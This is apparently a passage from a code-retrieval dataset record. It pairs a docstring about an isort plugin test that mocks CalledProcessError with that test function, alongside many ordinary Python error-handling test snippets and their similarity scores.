process.Packager(options)\n excinfo.match(r'File ([a-zA-Z_\\.\\'].*) not found in file list.')", "def shellExecErrorCode(cmd):\n return subprocess.call(cmd, shell=True)", "def test_init(self):\n nt.assert_raises(Exception, CisInterface.CisOutput, 'error')", "def has_errors_fatal(self) -> bool:", "def test_raise_exception(self):\n with self.assertRaises(Exception):\n SshCommandBuilder(SERVER_USER, COMMAND).to_build()", "def test_invalidFile(self):\n self.assertRaises(cesmEnvLib.checkFile(\"blah\", \"write\"))", "def test_extract_raises(capsys):\n with mock.patch('uflash.extract', side_effect=RuntimeError(\"boom\")):\n with pytest.raises(SystemExit):\n uflash.main(argv=['--extract', 'test.py'])\n\n _, stderr = capsys.readouterr()\n expected = 'Error extracting test.py'\n assert expected in stderr", "def testTempDirWhenDeleteEncounterError(self):\n self.Patch(os, \"chmod\")\n self.Patch(tempfile, \"mkdtemp\", return_value=\"/tmp/tempdir\")\n expected_error = OSError(\"Expected OS Error\")\n self.Patch(shutil, \"rmtree\", side_effect=expected_error)\n\n def _Call():\n with utils.TempDir():\n pass\n\n # Verify OSError should be raised.\n self.assertRaises(OSError, _Call)\n tempfile.mkdtemp.assert_called_once() #pylint: disable=no-member\n shutil.rmtree.assert_called_with(\"/tmp/tempdir\") #pylint: disable=no-member", "def look_for_cython_error(capfd):\n yield\n _, err = capfd.readouterr()\n assert \"Exception ignored\" not in err", "def test_stats_issue_43328(test_file):\n fake_file = test_file.parent / \"fake.file\"\n with pytest.raises(CommandExecutionError):\n win_file.stats(fake_file)", "def test_bad_file():\n\n bad_file = random_string()\n letter = random.choice(string.ascii_lowercase)\n rv, out = getstatusoutput('{} {} -f {}'.format(prg, letter, bad_file))\n assert rv != 0\n expected = \"No such file or directory: '{}'\".format(bad_file)\n assert re.search(expected, out)", "def test_check_if_not_error(self):\n actual_result = SshpassErrorExitCodeController(OK_RETURN_CODE,\n OK_MESSAGE)\\\n .check_if_error()\n self.assertIsNone(actual_result)", "def test_sign_file_unknown_error(dummy_command, tmp_path):\n # Raise an unknown error during codesign\n dummy_command.tools.subprocess.run.side_effect = mock_codesign(\"Unknown error\")\n\n with pytest.raises(BriefcaseCommandError, match=\"Unable to code sign \"):\n dummy_command.sign_file(\n tmp_path / \"base_path\" / \"random.file\",\n identity=\"Sekrit identity (DEADBEEF)\",\n )\n\n # An attempt to codesign was made\n dummy_command.tools.subprocess.run.assert_has_calls(\n [\n sign_call(\n tmp_path,\n tmp_path / \"base_path\" / \"random.file\",\n entitlements=False,\n ),\n ],\n any_order=False,\n )", "def test_bytes_to_intel_hex_io_error(mock_string_io, mock_stderr):\n data = [1, 2, 3, 4, 5]\n mock_string_io.return_value.write.side_effect = IOError()\n\n result = cmds._bytes_to_intel_hex(data=data)\n\n assert result is None\n assert mock_stderr.call_count == 1", "def FileCheck(fn):\n try:\n open(fn, \"r\")\n return 1\n except IOError:\n print(\"Error: File does not exist.\")\n return 0", "def test_execute_or_bail_internal_error(self):\n with self.assertLogs(level=\"INFO\") as cm:\n # This patches the \"croak\" function that is IMPORTED inside \"etl.commands\".\n with unittest.mock.patch(\"etl.commands.croak\") as mocked_croak:\n with etl.commands.execute_or_bail(\"unittest\"):\n # Simulate an internal error where we don't catch an exception.\n raise ValueError(\"oops\")\n mocked_croak.assert_called()\n # The exit code (2nd arg) is expected to be 3 for uncaught exceptions.\n self.assertEqual(mocked_croak.call_args[0][1], 3)\n\n self.assertEqual(len(cm.output), 2)\n self.assertIn(\"terrible happened\", cm.output[0])", "def unexpected_error(self, exception):", "def test_with_empty_args(self, mock_builtins_open, capsys, prog, main):\n with pytest.raises(SystemExit):\n main()\n _, err = capsys.readouterr()\n assert err.startswith('usage: {}'.format(prog))", "def _check_error(self, ipi):\n\n ipi_error = ipi.communicate(timeout=120)[1].decode(\"ascii\")\n assert \"\" == ipi_error, \"IPI ERROR OCCURED: {}\".format(ipi_error)", "def test_not_exectuable(self):\n (status, output, imlog, makelog) = \\\n self.run_instmake_build(log_prefix=\"not-executable\",\n make_opts=[\"not-executable\"])\n\n self.assertEqual(status, util.SUCCESS, output)", "def test_broken_error_module(self):\r\n with self.assertRaises(TestException):\r\n module = self.descriptor._xmodule", "def isexe(fpath):\n return path.exists(fpath) and access(fpath, X_OK)", "def test_check_module(self) -> None:\n check_module(\"os\")", "def test_invalid_dir(self):\n self.assertRaises(OSError, awstats_reader.AwstatsReader, '/tmp/XYZ', 'example.com')", "def test_valid_file_raises():\n with pytest.raises(ValueError):\n cli._valid_file(__file__)", "def NotADirectoryError(inst):\n return hasattr(inst, 'errno') and inst.errno == errno.ENOTDIR", "def test_raise_if_err_ok(self) -> None:\n assert Ok(2).raise_if_err(\"err\") == 2", "def test_check_if_error_six(self):\n with self.assertRaises(MyError):\n SshpassErrorExitCodeController(6, ERROR_MESSAGE)\\\n .check_if_error()", "def test_read_no_file():\n filename = 'asdf'\n with pytest.raises(FileNotFoundError):\n read_file(filename)", "def test_broken_error_descriptor(self):\r\n with self.assertRaises(TestException):\r\n module = self.descriptor._xmodule", "def test_driver_from_file_errors(execute_kwargs_py):\n with pytest.raises(errors.MapcheteDriverError):\n driver_from_file(execute_kwargs_py)\n\n with pytest.raises(FileNotFoundError):\n driver_from_file(\"non_existing_file.tif\", quick=False)", "def test_fail_flow_invalid_distro(self):\n # make the mock for SshShell fail to execute commands\n self._mock_ssh_shell.run.return_value = (1, 'command not found')\n\n # instantiate the guest class we want to test\n system_name = 'dummy_system'\n host_name = 'dummy.domain.com'\n user = 'root'\n passwd = 'somepwd'\n extensions = {}\n guest_obj = linux.GuestLinux(\n system_name, host_name, user, passwd, extensions)\n\n # check if correctly raises the exception\n self.assertRaises(ConnectionError, guest_obj.login)\n\n # change the mock now to successfully execute the command but report an\n # incorrect kernel name\n self._mock_ssh_shell.run.return_value = (\n 0,\n 'OtherOS dummy 4.4.6 #1 SMP Wed Mar 16 22:13:40 UTC 2016 x86_64 '\n 'x86_64 x86_64 Some/OS'\n )\n guest_obj = linux.GuestLinux(\n system_name, host_name, user, passwd, extensions)\n\n # check if correctly raises the exception\n self.assertRaisesRegex(\n ConnectionError, '^Target system is not Linux$', guest_obj.login\n )", "def on_error(func, path, exc_info):\n import stat\n if not os.access(path, os.W_OK):\n # Is the error an access error ?\n os.chmod(path, stat.S_IWUSR)\n func(path)\n else:\n raise", "def handle_ioexception(self, exception):\n return True" ]
[ "0.7091949", "0.68408364", "0.6782386", "0.6650079", "0.66032916", "0.6333252", "0.6230165", "0.6217626", "0.61586803", "0.6140074", "0.60988116", "0.6090791", "0.6002094", "0.60008836", "0.598052", "0.5965969", "0.5965969", "0.59647274", "0.595298", "0.59336317", "0.59047925", "0.58992267", "0.5898923", "0.5870315", "0.58648866", "0.5844375", "0.5834275", "0.5806941", "0.58029044", "0.57923126", "0.57725996", "0.5769801", "0.57650244", "0.5756039", "0.57545274", "0.5749916", "0.5742899", "0.57342035", "0.5730068", "0.5720979", "0.57176006", "0.5697197", "0.56777006", "0.56688285", "0.5658031", "0.5654664", "0.5649373", "0.5642489", "0.5634441", "0.56309235", "0.5628874", "0.56259507", "0.5625503", "0.5622651", "0.5610448", "0.561016", "0.56099075", "0.560556", "0.55936867", "0.55932784", "0.5592612", "0.5582704", "0.5576372", "0.55696994", "0.55675554", "0.55628127", "0.5558178", "0.55575484", "0.5552635", "0.55525124", "0.5551288", "0.5549888", "0.55413485", "0.55366796", "0.55298406", "0.55283195", "0.55251056", "0.5515913", "0.54934394", "0.5493312", "0.54880226", "0.54828364", "0.54690677", "0.5466026", "0.54597986", "0.5459236", "0.5453509", "0.5445545", "0.54430455", "0.5430554", "0.5422081", "0.5420834", "0.5419391", "0.5418308", "0.5417813", "0.5409733", "0.5408553", "0.54080474", "0.5403379", "0.5398198" ]
0.65513504
5
Test what happens when a CalledProcessError is raised (usually means isort hit an error).
def test_isort_tool_plugin_scan_calledprocesserror(mock_subprocess_check_output): mock_subprocess_check_output.side_effect = subprocess.CalledProcessError( 0, "", output="mocked error" ) itp = setup_isort_tool_plugin() package = Package( "valid_package", os.path.join(os.path.dirname(__file__), "valid_package") ) package["python_src"] = [ os.path.join(os.path.dirname(__file__), "valid_package", "sample.py") ] issues = itp.scan(package, "level") assert len(issues) == 1
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_make_tool_plugin_scan_calledprocesserror(mock_subprocess_check_output):\n mock_subprocess_check_output.side_effect = subprocess.CalledProcessError(1, '', output=\"mocked error\")\n mtp = setup_make_tool_plugin()\n package = Package('valid_package', os.path.join(os.path.dirname(__file__),\n 'valid_package'))\n package['make_targets'] = 'make_targets'\n issues = mtp.scan(package, 'level')\n assert not issues", "def check_call(*args, **kwargs):\n rc = call(*args, **kwargs)\n if rc != 0:\n cmd = kwargs.get(\"args\")\n if cmd is None:\n cmd = args[0]\n raise CalledProcessError(rc, cmd)\n return 0", "def test_dump_handles_oserror(mocker):\n mocker.patch('subprocess.Popen' , side_effect=OSError(\"no such file\"))\n with pytest.raises(SystemExit):\n pgdump.dump(url)", "def called_process_error2exit_decorator(func):\n @functools.wraps(func)\n def func_wrapper(*args, **kwargs):\n try:\n func(*args, **kwargs)\n except subprocess.CalledProcessError as e:\n print(\"{err}:\\n{msg}\".format(err=str(e), msg=e.output))\n sys.exit(1)\n return func_wrapper", "def test_dump_handles_os_error(mocker):\n\tmocker.patch('subprocess.Popen', side_effect=OSError('no such file'))\n\twith pytest.raises(SystemExit):\n\t\tpgdump.dump(url)", "def test_start_args(self, mocked_check, mocked_proc):\n from supvisors.rpcinterface import RPCInterface\n # prepare context\n info_source = self.supervisor.supvisors.info_source\n info_source.update_extra_args.side_effect = KeyError\n info_source.supervisor_rpc_interface.startProcess.side_effect = [\n RPCError(Faults.NO_FILE, 'no file'),\n RPCError(Faults.NOT_EXECUTABLE),\n RPCError(Faults.ABNORMAL_TERMINATION),\n 'done']\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test RPC call with extra arguments and a process that is not compliant\n with self.assertRaises(RPCError) as exc:\n rpc.start_args('appli:proc', 'dummy arguments')\n self.assertEqual(Faults.BAD_EXTRA_ARGUMENTS, exc.exception.code)\n self.assertEqual(\"BAD_EXTRA_ARGUMENTS: rules for namespec appli:proc\"\n \" are not compatible with extra arguments in command line\",\n exc.exception.text)\n self.assertEqual(0, mocked_check.call_count)\n self.assertEqual(0, info_source.update_extra_args.call_count)\n self.assertEqual(0, info_source.supervisor_rpc_interface.startProcess.call_count)\n # test RPC call with extra arguments and a process that is compliant\n # but unknown in Supervisor\n with self.assertRaises(RPCError) as exc:\n rpc.start_args('appli:proc', 'dummy arguments')\n self.assertEqual(Faults.BAD_NAME, exc.exception.code)\n self.assertEqual(\"BAD_NAME: namespec appli:proc unknown in this Supervisor instance\",\n exc.exception.text)\n self.assertEqual([call('appli:proc', 'dummy arguments')],\n info_source.update_extra_args.call_args_list)\n self.assertEqual(0, info_source.supervisor_rpc_interface.startProcess.call_count)\n info_source.update_extra_args.reset_mock()\n info_source.update_extra_args.side_effect = None\n # test RPC call with start exceptions\n mocked_proc.side_effect = None\n mocked_proc.return_value = None, None\n # NO_FILE exception triggers an update of the process state\n with self.assertRaises(RPCError) as exc:\n rpc.start_args('appli:proc')\n self.assertEqual(Faults.NO_FILE, exc.exception.code)\n self.assertEqual(\"NO_FILE: no file\", exc.exception.text)\n self.assertEqual([call('appli:proc', '')],\n info_source.update_extra_args.call_args_list)\n self.assertEqual([call('appli:proc', True)],\n info_source.supervisor_rpc_interface.startProcess.call_args_list)\n self.assertEqual([call('appli:proc', 'NO_FILE: no file')],\n info_source.force_process_fatal.call_args_list)\n # reset patches\n info_source.update_extra_args.reset_mock()\n info_source.force_process_fatal.reset_mock()\n info_source.supervisor_rpc_interface.startProcess.reset_mock()\n # NOT_EXECUTABLE exception triggers an update of the process state\n with self.assertRaises(RPCError) as exc:\n rpc.start_args('appli:proc', wait=False)\n self.assertEqual(Faults.NOT_EXECUTABLE, exc.exception.code)\n self.assertEqual(\"NOT_EXECUTABLE\", exc.exception.text)\n self.assertEqual([call('appli:proc', '')],\n info_source.update_extra_args.call_args_list)\n self.assertEqual([call('appli:proc', False)],\n info_source.supervisor_rpc_interface.startProcess.call_args_list)\n self.assertEqual([call('appli:proc', 'NOT_EXECUTABLE')],\n info_source.force_process_fatal.call_args_list)\n # reset patches\n info_source.update_extra_args.reset_mock()\n info_source.force_process_fatal.reset_mock()\n info_source.supervisor_rpc_interface.startProcess.reset_mock()\n # other exception doesn't trigger an update of the process state\n with self.assertRaises(RPCError) as exc:\n rpc.start_args('appli:proc', wait=False)\n self.assertEqual(Faults.ABNORMAL_TERMINATION, exc.exception.code)\n self.assertEqual(\"ABNORMAL_TERMINATION\", exc.exception.text)\n self.assertEqual([call('appli:proc', '')],\n info_source.update_extra_args.call_args_list)\n self.assertEqual([call('appli:proc', False)],\n info_source.supervisor_rpc_interface.startProcess.call_args_list)\n self.assertEqual(0, info_source.force_process_fatal.call_count)\n # reset patches\n info_source.update_extra_args.reset_mock()\n info_source.supervisor_rpc_interface.startProcess.reset_mock()\n # finally, normal behaviour\n self.assertEqual('done', rpc.start_args('appli:proc'))", "def test_startProcessUnknownKeyError(self):\r\n self.assertRaises(KeyError, self.pm.startProcess, \"foo\")", "def test_not_running(): # pragma: windows\n comm_kwargs = dict(comm='IPCComm', direction='send', reverse_names=True)\n nt.assert_raises(RuntimeError, new_comm, 'test', **comm_kwargs)", "def sanity_check_process(self):\n assert_equals(self.proc.returncode, None)\n time.sleep(1)", "def print_unable_to_run(exc: \"CalledProcessError\"):\n _print(str(exc), level=MessageLevel.QUIET)", "def test_exceptions():\r\n # test that trying to connect_ to a non existent app fails\r\n try:\r\n app = application.Application()\r\n app.connect(path=r\"No process with this please\")\r\n assert False\r\n except application.ProcessNotFoundError:\r\n print('ProcessNotFoundError has been raised. OK.')\r\n\r\n # test that trying to connect_ to a non existent app fails\r\n try:\r\n app = application.Application()\r\n app.start(cmd_line = r\"No process with this please\")\r\n assert False\r\n except application.AppStartError:\r\n print('AppStartError has been raised. OK.')", "def test_runFailed(self):\n builder = BookBuilder()\n exc = self.assertRaises(\n CommandFailed, builder.run,\n [sys.executable, '-c', 'print \"hi\"; raise SystemExit(1)'])\n self.assertEquals(exc.exitStatus, 1)\n self.assertEquals(exc.exitSignal, None)\n self.assertEquals(exc.output, \"hi\\n\")", "def test_invoke_pipe_not_found():\n\n testapp = holocron.Application()\n\n with pytest.raises(ValueError) as excinfo:\n next(testapp.invoke(\"test\"))\n\n assert str(excinfo.value) == \"no such pipe: 'test'\"", "def check_call_out(args, **kwargs):\n out, returncode = communicate(args, **kwargs)\n if returncode:\n raise CalledProcessError(\n returncode, args, kwargs.get('cwd'), out[0], out[1])\n return out", "def test_unexpected_error_in_processor(self):\n\n one_process_workflow = \"\"\"file://B <- file://A ! buggy_processor\n echo A does not produce B\n \"\"\"\n process = run_first_process(one_process_workflow, BuggyProcessor())\n assert process.success is False, process.error_message\n assert process.error_message.find('An unexpected error have happen in tuttle processor '\n 'buggy_processor :') >= 0, process.error_message\n assert process.error_message.find('Traceback (most recent call last):') >= 0, process.error_message\n assert process.error_message.find('raise Exception(\"Unexpected error in processor\")') >= 0, process.error_message\n assert process.error_message.find('will not complete.') >= 0, process.error_message", "def test_subprocess_fork_pid0_exception(self, mocker):\n mocker.stopall()\n\n test_command = [\"who\", \"-b\"]\n test_name = \"test_who\"\n test_fork = True\n pid = 0\n\n # mock\n mock_logging_debug = mocker.MagicMock(name=\"mock_logging_debug\")\n mock_logging_error = mocker.MagicMock(name=\"mock_logging_error\")\n mock_os_fork = mocker.MagicMock(name=\"mock_os_fork\", side_effect=[pid, OSError])\n mock_sys_exit = mocker.MagicMock(name=\"mock_sys_exit\")\n mock_os_chdir = mocker.MagicMock(name=\"mock_os_chdir\")\n mock_os_setsid = mocker.MagicMock(name=\"mock_os_setsid\")\n mock_os_umask = mocker.MagicMock(name=\"mock_os_umask\")\n\n # patch\n mocker.patch.object(\n scarlett_os.subprocess.logging.Logger, \"debug\", mock_logging_debug\n )\n mocker.patch.object(\n scarlett_os.subprocess.logging.Logger, \"error\", mock_logging_error\n )\n mocker.patch.object(scarlett_os.subprocess.os, \"fork\", mock_os_fork)\n mocker.patch.object(scarlett_os.subprocess.sys, \"exit\", mock_sys_exit)\n mocker.patch.object(scarlett_os.subprocess.os, \"chdir\", mock_os_chdir)\n mocker.patch.object(scarlett_os.subprocess.os, \"setsid\", mock_os_setsid)\n mocker.patch.object(scarlett_os.subprocess.os, \"umask\", mock_os_umask)\n\n scarlett_os.subprocess.Subprocess(test_command, name=test_name, fork=test_fork)\n\n mock_logging_error.assert_any_call(\"Error forking process second time\")\n\n mocker.stopall()", "def unavailable_process(**kwargs):\n return LazySubprocessTester([sys.executable, \"-c\", \"import sys; sys.exit(1)\"], **kwargs)", "def test_execute_or_bail_internal_error(self):\n with self.assertLogs(level=\"INFO\") as cm:\n # This patches the \"croak\" function that is IMPORTED inside \"etl.commands\".\n with unittest.mock.patch(\"etl.commands.croak\") as mocked_croak:\n with etl.commands.execute_or_bail(\"unittest\"):\n # Simulate an internal error where we don't catch an exception.\n raise ValueError(\"oops\")\n mocked_croak.assert_called()\n # The exit code (2nd arg) is expected to be 3 for uncaught exceptions.\n self.assertEqual(mocked_croak.call_args[0][1], 3)\n\n self.assertEqual(len(cm.output), 2)\n self.assertIn(\"terrible happened\", cm.output[0])", "def test_get_case_command_fail(loqusdbapi, mocker):\n # GIVEN a loqusdb api and a case id\n case_id = 'a_case'\n # WHEN an error occurs during fetching a case with the adapter\n mocker.patch.object(subprocess, 'check_output')\n subprocess.check_output.side_effect = subprocess.CalledProcessError(1, 'error')\n\n # THEN assert that the error is raised\n with pytest.raises(subprocess.CalledProcessError):\n loqusdbapi.get_case(case_id)", "def test_subprocess_fails_with_no_command(self):\n with self.assertRaises(ValueError):\n LazySubprocessTester([])", "def test_missing_file(self):\n with self.assertRaises(subprocess.CalledProcessError) as cm:\n subprocess.check_output(\n [sys.executable, idf_py_path, '--version', '@args_non_existent'],\n env=os.environ,\n stderr=subprocess.STDOUT).decode('utf-8', 'ignore')\n self.assertIn('(expansion of @args_non_existent) could not be opened', cm.exception.output.decode('utf-8', 'ignore'))", "def test_use_exit_status(self): # suppress(no-self-use)\n subprocess.call.return_value = 1\n GreenTestCommand(Distribution()).run()\n sys.exit.assert_called_with(1)", "def test_runSignaled(self):\n builder = BookBuilder()\n exc = self.assertRaises(\n CommandFailed, builder.run,\n [sys.executable, '-c',\n 'import sys; print \"hi\"; sys.stdout.flush(); '\n 'import os; os.kill(os.getpid(), 9)'])\n self.assertEquals(exc.exitSignal, 9)\n self.assertEquals(exc.exitStatus, None)\n self.assertEquals(exc.output, \"hi\\n\")", "def test_check_if_error(self):\n with self.assertRaises(MyError):\n ExecutionExitCodeController(ERROR_RETURN_CODE, ERROR_MESSAGE)\\\n .check_if_error()", "def _handleExceptionAndCheckCall(array_call, **kwargs):\n stdout = kwargs.get('stdout', subprocess.PIPE)\n stderr = kwargs.get('stderr', subprocess.PIPE)\n shell = kwargs.get('shell', False)\n\n cmd = array_call[0]\n\n output = None\n error = None\n\n # TODO: Check the value of array_call and <=[0]\n logging.debug(\"Calling {0}:\".format(cmd))\n logging.debug(\"%s\", array_call)\n logging.debug(\"---------\")\n\n # TODO: Use universal_newlines option from Popen?\n try:\n p = subprocess.Popen(array_call, stdout=stdout,\n stderr=stderr, shell=shell)\n\n # TODO: Change this because of possible memory issues => https://docs.python.org/2/library/subprocess.html#subprocess.Popen.communicate\n\n output, error = p.communicate()\n\n if stdout == subprocess.PIPE:\n logging.debug(\"\\t{0}\".format(output))\n else:\n logging.debug(\"\\tOutput in file {0}\".format(stdout.name))\n # If we detect an error from the subprocess, then we raise an exception\n # TODO: Manage if we raise an exception for everything, or use CRITICAL etc... but not stop process\n # TODO: The responsability of returning a sys.exit() should not be there, but up in the app.\n if p.returncode:\n if stderr == subprocess.PIPE:\n raise PopenError(cmd, error, p.returncode)\n else:\n # TODO: To Handle properly with a design behind, if we received a option as a file for the error\n raise Exception(\"Error when calling {0}. Error as been logged in your file {1}. Error code: {2}\"\n .format(cmd, stderr.name, p.returncode))\n\n except OSError as e:\n message = \"The subprocess {0} has encountered an OSError: {1}\".format(\n cmd, e.strerror)\n if e.filename:\n message = '\\n'.join(\n (message, \", against this file: {0}\".format(e.filename)))\n logging.error(message)\n sys.exit(-1)\n except PopenError as p:\n message = \"The subprocess {0} has returned the error: {1}.\".format(\n p.cmd, p.return_code)\n message = '\\n'.join(\n (message, \"Its error message is: {0}\".format(p.error)))\n\n logging.exception(message)\n\n sys.exit(p.return_code)\n except Exception as e:\n message = \"The subprocess {0} has encountered an unknown error: {1}\".format(\n cmd, e)\n logging.exception(message)\n\n sys.exit(-1)\n return p", "def test_ns_fail():\n env = NsSimPyEnvironment()\n env.process(some_process(env, 10.1))\n env.run()", "def test_unexpected_error_in_exists(self):\n # TODO\n one_process_workflow = \"\"\"buggy://B <- file://A\n echo A produces B > B\n \"\"\"\n process = run_first_process(one_process_workflow, extra_resource=BuggyExistsResource)\n assert process.success is False, process.error_message\n assert process.error_message.find('An unexpected error have happen in tuttle while checking existence of '\n 'output resources' ) >= 0, process.error_message\n assert process.error_message.find('Traceback (most recent call last):') >= 0, process.error_message\n assert process.error_message.find('raise Exception(\"Unexpected error in exists()\")') >= 0, process.error_message\n assert process.error_message.find('Process cannot be considered complete.') >= 0, process.error_message", "def _handle_failure(self, proc, test_case):\n if proc.returncode != 0:\n print('ERROR: Test execution failed: {}'.format(test_case.get_name()))\n stdout, stderr = proc.communicate()\n raise TestCaseFailure('Test case {} failed. stdout: {}, stderr: {}, '\n 'return code: {}.'.format(test_case.get_name(),\n stdout, stderr,\n proc.returncode))", "def test_error_message_from_background_process(self):\n one_process_workflow = \"\"\"file://B <- file://A\n error\n echo A produces B > B\n \"\"\"\n process = run_first_process(one_process_workflow)\n assert process.error_message.find(\"Process ended with error code\") >= 0, process.error_message", "def run(cmd):\n print ' '.join(cmd)\n try:\n check_call(cmd)\n except CalledProcessError as cpe:\n print \"Error: return code: \" + str(cpe.returncode)\n sys.exit(cpe.returncode)", "async def test_raise_call_error(base_central_system):\n call_error = CallError(\n unique_id=\"1337\",\n error_code=\"GenericError\",\n error_description=\"test_raise_call_error\",\n )\n await base_central_system.route_message(call_error.to_json())\n\n payload = call.ClearCachePayload()\n with pytest.raises(GenericError):\n await base_central_system.call(payload, suppress=False)", "def test_extract_raises(capsys):\n with mock.patch('uflash.extract', side_effect=RuntimeError(\"boom\")):\n with pytest.raises(SystemExit):\n uflash.main(argv=['--extract', 'test.py'])\n\n _, stderr = capsys.readouterr()\n expected = 'Error extracting test.py'\n assert expected in stderr", "def test_cmd_error(self):\n task = Task(\"uid\", False, False, \"does_not_exist\", None, \".\")\n task._checkpoint_dir = tmp_checkpoint_dir()\n with self.assertRaisesRegexp(RuntimeError, \".*executing Task's command:.*\"):\n task.run()\n task.shell = True\n with self.assertRaisesRegexp(RuntimeError, \".*executing Task's command:.*\"):\n task.run()\n task._dry_run = True\n task.run() # No longer raises RuntimeError", "def test_execute_process_killed():\n port = port_for.select_random()\n passing_check = check_tcp(port)\n\n def failing_check_for_testing_purposes():\n return False\n\n with pytest.raises(PostChecksFailed) as checks_failed:\n execute([SERVICE, 'tcp', '--port', str(port)], [passing_check, failing_check_for_testing_purposes], timeout=1)\n\n assert 'function failing_check_for_testing_purposes' in str(checks_failed.value)\n\n # The process will be killed and nothing will be listening on that port.\n wait_until(lambda: passing_check() is False)", "def test_watch_raises(capsys):\n with mock.patch('uflash.watch_file', side_effect=RuntimeError(\"boom\")):\n with pytest.raises(SystemExit):\n uflash.main(argv=['--watch', 'test.py'])\n\n _, stderr = capsys.readouterr()\n expected = 'Error watching test.py'\n assert expected in stderr", "def test_option_unhandled(self):\n cmd, output = runCmdOutput(['--__unhandled__'])\n self.assertEqual(cmd.returncode, os.EX_USAGE)", "def test_stats_issue_43328(test_file):\n fake_file = test_file.parent / \"fake.file\"\n with pytest.raises(CommandExecutionError):\n win_file.stats(fake_file)", "def testError(self):\n cmds = \"\"\"chown 0 missingFile\npwd\nexit\n\"\"\"\n\n def _cbCheckResult(res):\n self.assertNotIn(self.testDir.asBytesMode().path, res)\n\n d = self._getBatchOutput(cmds)\n d.addCallback(_cbCheckResult)\n return d", "def test_unexpected_error_in_signature(self):\n # TODO\n one_process_workflow = \"\"\"buggy://B <- file://A\n echo A produces B > B\n \"\"\"\n process = run_first_process(one_process_workflow, extra_resource=BuggySignatureResource)\n assert process.success is False, process.error_message\n assert process.error_message.find('An unexpected error have happen in tuttle while retrieving signature' \\\n ) >= 0, process.error_message\n assert process.error_message.find('Traceback (most recent call last):') >= 0, process.error_message\n assert process.error_message.find('raise Exception(\"Unexpected error in signature()\")') >= 0, process.error_message\n assert process.error_message.find('Process cannot be considered complete.') >= 0, process.error_message", "def crashed(self):\n\n return len(self.backtrace) > 0 or (self.run_as_script and self.return_code != 0)", "def test_invoke_processor_errors():\n\n def processor(app, documents):\n raise ValueError(\"something bad happened\")\n yield\n\n testapp = holocron.Application()\n testapp.add_processor(\"processor\", processor)\n testapp.add_pipe(\"test\", [{\"name\": \"processor\"}])\n\n stream = testapp.invoke(\"test\")\n\n with pytest.raises(ValueError, match=r\"^something bad happened$\"):\n next(stream)\n\n with pytest.raises(StopIteration):\n next(stream)", "def check_call(self, cmd, nonzero_e = tc.error_e):\n self.run(cmd, nonzero_e = nonzero_e)", "def test_shell_bad_command():\n out, err = shell_command(\"ls adasdasdas\")\n assert out is None\n assert \"adasdasdas\" in err", "def test_invoke_processor_not_found():\n\n testapp = holocron.Application()\n testapp.add_pipe(\"test\", [{\"name\": \"processor\"}])\n\n with pytest.raises(ValueError) as excinfo:\n next(testapp.invoke(\"test\"))\n\n assert str(excinfo.value) == \"no such processor: 'processor'\"", "def test_check_if_error(self):\n with self.assertRaises(MyError):\n SshErrorExitCodeController(255, ERROR_MESSAGE)\\\n .check_if_error()", "def test_check_if_error(self):\n with self.assertRaises(MyError):\n BaseErrorExitCodeController(ERROR_RETURN_CODE, ERROR_MESSAGE)\\\n .check_if_error()", "def pytest_internalerror(self, excrepr, excinfo):\n for line in str(excrepr).split(\"\\n\"):\n sys.stderr.write(\"INTERNALERROR> {}\\n\".format(line))\n sys.stderr.flush()\n tb = _postmortem_traceback(excinfo)\n post_mortem(tb, excinfo)", "def test_subprocess_fork_exception(self, mocker):\n mocker.stopall()\n\n test_command = [\"fake\", \"command\"]\n test_name = \"fake_command\"\n test_fork = True\n\n # mock\n mock_logging_debug = mocker.MagicMock(name=\"mock_logging_debug\")\n mock_os_fork = mocker.MagicMock(name=\"mock_os_fork\", side_effect=OSError)\n mock_sys_exit = mocker.MagicMock(name=\"mock_sys_exit\")\n mock_os_chdir = mocker.MagicMock(name=\"mock_os_chdir\")\n mock_os_setsid = mocker.MagicMock(name=\"mock_os_setsid\")\n mock_os_umask = mocker.MagicMock(name=\"mock_os_umask\")\n\n # patch\n mocker.patch.object(\n scarlett_os.subprocess.logging.Logger, \"debug\", mock_logging_debug\n )\n mocker.patch.object(scarlett_os.subprocess.os, \"fork\", mock_os_fork)\n mocker.patch.object(scarlett_os.subprocess.sys, \"exit\", mock_sys_exit)\n mocker.patch.object(scarlett_os.subprocess.os, \"chdir\", mock_os_chdir)\n mocker.patch.object(scarlett_os.subprocess.os, \"setsid\", mock_os_setsid)\n mocker.patch.object(scarlett_os.subprocess.os, \"umask\", mock_os_umask)\n\n tfork2 = scarlett_os.subprocess.Subprocess(\n test_command, name=test_name, fork=test_fork\n )\n\n # NOTE: Bit of duplication we have going here.\n assert mock_sys_exit.call_count == 2\n assert tfork2.stdout == False\n assert tfork2.stderr == False\n assert mock_os_chdir.call_count == 1\n assert mock_os_setsid.call_count == 1\n assert mock_os_umask.call_count == 1\n assert mock_os_fork.call_count == 2\n\n mock_os_chdir.assert_called_once_with(\"/\")\n\n mocker.stopall()", "def test_verify_error(self):\n task = Task(\"uid\", False, False, \"echo\", \"does_not_exist\", \".\", \"A\")\n task._checkpoint_dir = tmp_checkpoint_dir()\n with self.assertRaisesRegexp(RuntimeError, \".*executing Task's verification:.*\"):\n task.run()\n task.shell = True\n with self.assertRaisesRegexp(RuntimeError, \".*executing Task's verification:.*\"):\n task.run()\n task._dry_run = True\n task.run() # No longer raises RuntimeError", "def call_error():\r\n print(\"Error in input format.\")\r\n sys.exit()", "def test_failing_git_command(self):\n code = Code(self.build)\n\n proc_mock = Mock()\n proc_mock.returncode = 1\n response = Response(proc_mock, '', 'herp derp')\n code._command = Mock(return_value=response)\n code._which_git = Mock(return_value='lol')\n code.update()", "def report_error_handled(self, calculation, action):\n arguments = [calculation.process_label, calculation.pk, calculation.exit_status, calculation.exit_message]\n self.report('{}<{}> failed with exit status {}: {}'.format(*arguments))\n self.report(f'Action taken: {action}')", "def test_signal_no_pid(self):\n code, out, err = self.t.runError(\"--pid 0\")\n self.assertIn(\"A non-zero PID must be specified.\", out)", "def test_stopProcessUnknownKeyError(self):\r\n self.assertRaises(KeyError, self.pm.stopProcess, \"foo\")", "def determine_exit_code(self) -> int:", "def HandlePipelineToolsCalledProcessError( exc ):\n errorMsg = StringIO()\n errorMsg.write( \"Pipeline Tools encountered an error - the command:\" )\n errorMsg.write( os.linesep * 2 )\n errorMsg.write( exc.cmd )\n errorMsg.write( os.linesep * 2 )\n errorMsg.write( \"return a non-zero (%d) exit code\" % exc.returncode )\n\n if exc.output:\n errorMsg.write( \" and the following output:\" )\n errorMsg.write( os.linesep * 2 )\n errorMsg.write( exc.output )\n\n 